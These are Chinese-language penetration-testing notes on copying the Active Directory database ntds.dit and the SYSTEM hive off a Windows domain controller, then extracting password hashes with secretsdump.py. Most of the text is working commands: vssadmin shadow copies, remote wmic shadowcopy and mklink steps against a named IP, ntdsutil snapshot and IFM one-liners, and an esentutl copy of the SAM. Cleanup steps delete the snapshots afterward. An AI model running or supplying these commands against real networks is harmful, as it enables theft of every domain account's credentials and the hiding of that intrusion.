基础-ntds.dit拖取

参考资料
https://3gstudent.github.io/3gstudent.github.io/域渗透-获得域控服务器的NTDS.dit文件/

基础知识

1. Ntds.dit文件是域环境中域控上会有的一个二进制文件，是主要的活动目录数据库，其文件路径为域控的 %SystemRoot%\ntds\ntds.dit，活动目录始终会访问这个文件，所以文件禁止被读取
2. reg save hklm\system c:\system.hive           导出ntds.dit后，还需要导出SYSTEM，将system.hive转储，因为system.hive中存放着ntds.dit的密钥

在一般情况下，Ntds.dit是默认被Windows系统锁定的，想要读取该文件就要利用卷影拷贝服务(Volume Shadow Copy Service，VSS)，得到Ntds.dit文件的副本。卷影拷贝服务(VSS)本质上是属于快照技术的一种，主要用于备份和恢复，即使目标文件被处于锁定状态

其获取Ntds.dit的基本步骤如下：
    创建目标主机的卷影拷贝（包含Windows上的全部文件）
    然后在创建的卷影拷贝中将ntds.dit复制出来
    最后将当前创建的卷影拷贝删除

调用Volume Shadow Copy服务会产生日志文件，位于System下，Event ID为7036

python secretsdump.py -system system.hive -ntds ntds.dit local          从NTDS.dit获取密码哈希值

利用vssadmin工具

vssadmin是Windows上的一个卷影拷贝服务的命令行管理工具，可用于创建和删除卷影拷贝、列出卷影拷贝的信息，显示已安装的所有卷影拷贝写入程序和提供程序，以及改变卷影拷贝的存储空间的大小等

vssadmin list shadows                                                                            查询当前系统的快照
vssadmin create shadow /for=C:                                                                   在已经获取到权限的域控制器上执行如下命令，创建一个C盘的卷影拷贝(获得Shadow Copy Volume Name为\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\ntds.dit           然后在创建的卷影拷贝中将ntds.dit复制到C盘中
vssadmin delete shadows /for=c: /quiet                                                           最后将刚刚创建的卷影拷贝删除

wmic远程shadowcopy

wmic远程shadowcopy
wmic shadowcopy call create "ClientAccessible","C:"
wmic shadowcopy get volumeName
wmic process call create "cmd /c mklink c:\windows\temp\a \\?\Volume{b7bca316-0000-0000-0000-501f00000000}\windows"
copy \\xx.xx\c$\windows\temp\a\windows\ntds\ntds.dit
wmic process call create "cmd /c rd c:\windows\temp\a"
wmic shadowcopy where "id='{78EB0D40-4D09-4F72-A8F9-C9DF49B03BB1}'" delete

wmic /node:192.168.9.136 shadowcopy get volumeName                      查询当前系统的快照
wmic /node:192.168.9.136 shadowcopy  call create  Volume=c:\            给c盘创建快照
wmic /node:192.168.9.136 shadowcopy get volumeName                      查看当前创建的快照    下一步使用
wmic /node:192.168.9.136 process call create "cmd /c mklink /d c:\windows\temp\a \\?\Volume{b4c3d945-35dd-11ea-8892-806e6f6e6963}\windows"           给快照创建符号链接访问快照中的文件
copy \\192.168.9.136\c$\windows\temp\a\windows\ntds\ntds.dit            拷贝ntds.dit到本地
wmic /node:192.168.9.136 process call create "cmd /c rd c:\windows\temp\a"
wmic shadowcopy where "id='{78EB0D40-4D09-4F72-A8F9-C9DF49B03BB1}'" delete

ntdsutil(会产生日志文件)

Volume Shadow Copy Service
支持Windows Server 2003 及以上操作系统

ntdsutil snapshot "List All" quit quit                           查询当前系统的快照
ntdsutil snapshot "List Mounted" quit quit

ntdsutil snapshot "activate instance ntds" create quit quit       创建快照  guid为{6e31c0ab-c517-420b-845d-c38acbf77ab9}

ntdsutil snapshot "mount {6e31c0ab-c517-420b-845d-c38acbf77ab9}" quit quit         挂载快照(快照挂载为C:\$SNAP_201802270645_VOLUMEC$\)
copy C:\$SNAP_201802270645_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit              复制ntds.dit

ntdsutil snapshot  "unmount {6e31c0ab-c517-420b-845d-c38acbf77ab9}" quit quit      卸载快照:
ntdsutil snapshot  "delete {6e31c0ab-c517-420b-845d-c38acbf77ab9}" quit quit       删除快照

###############################################################################
ntdsutil "activate instance ntds" ifm "create full C:\windows\temp\ntdsutil" quit quit                一行生成快照 自动拷贝到C:\windows\temp\ntdsutil  并且自动卸载

未测试

esentutl.exe /y /vss c:\windows\system32\config\sam /d sam